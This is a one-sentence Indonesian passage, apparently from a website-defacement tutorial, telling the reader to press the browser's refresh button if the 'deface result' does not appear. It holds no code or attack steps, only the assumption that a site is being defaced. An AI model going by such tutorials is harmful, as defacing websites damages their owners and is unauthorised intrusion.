kalo nggak ada hasil deface kamu coba klik tab refresh yang ada diatas yg disamping url/browsing kamu.